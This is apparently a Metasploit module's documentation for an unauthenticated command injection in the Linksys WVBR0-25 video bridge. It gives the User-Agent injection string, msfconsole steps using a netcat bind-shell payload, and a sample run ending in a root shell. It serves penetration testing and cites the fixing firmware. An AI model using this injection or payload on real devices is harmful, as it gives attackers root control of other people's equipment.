## Vulnerable Application

  This module exploits a command injection vulnerability in the Linksys WVBR0-25 wireless video bridge. More information about the device itself can be found on AT&T's [manuals page](https://www.att.com/help/manuals/directv/dvrs.html) under the "DIRECTV Wireless Video Bridge Gen2 Product Manual" heading, as well as on this [unofficial product page](https://www.solidsignal.com/pview.asp?p=wvb). A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
  The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.

  There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection.

  Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`.

  Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit.

## Verification Steps

  1. Make sure the device is running.
  2. Start msfconsole.
  3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
  4. Do: ```set payload cmd/unix/bind_netcat```
  5. Do: ```set RHOST [ip]```
  6. Do: ```exploit```
  7. You should get a shell.

## Options

  **PAYLOAD**

  The `generic` and `netcat` payload types are valid.

## Scenarios

### Firmware 1.0.39

  The following is an example run getting a shell:

  ```
  msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
  payload => cmd/unix/bind_netcat
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
  RHOST => 10.0.0.104
  msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

  [*] 10.0.0.104:80 - Trying to access the device ...
  [*] Started bind handler
  [*] 10.0.0.104:80 - Exploiting...
  [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
  id

  uid=0(root) gid=0(root)
  ```
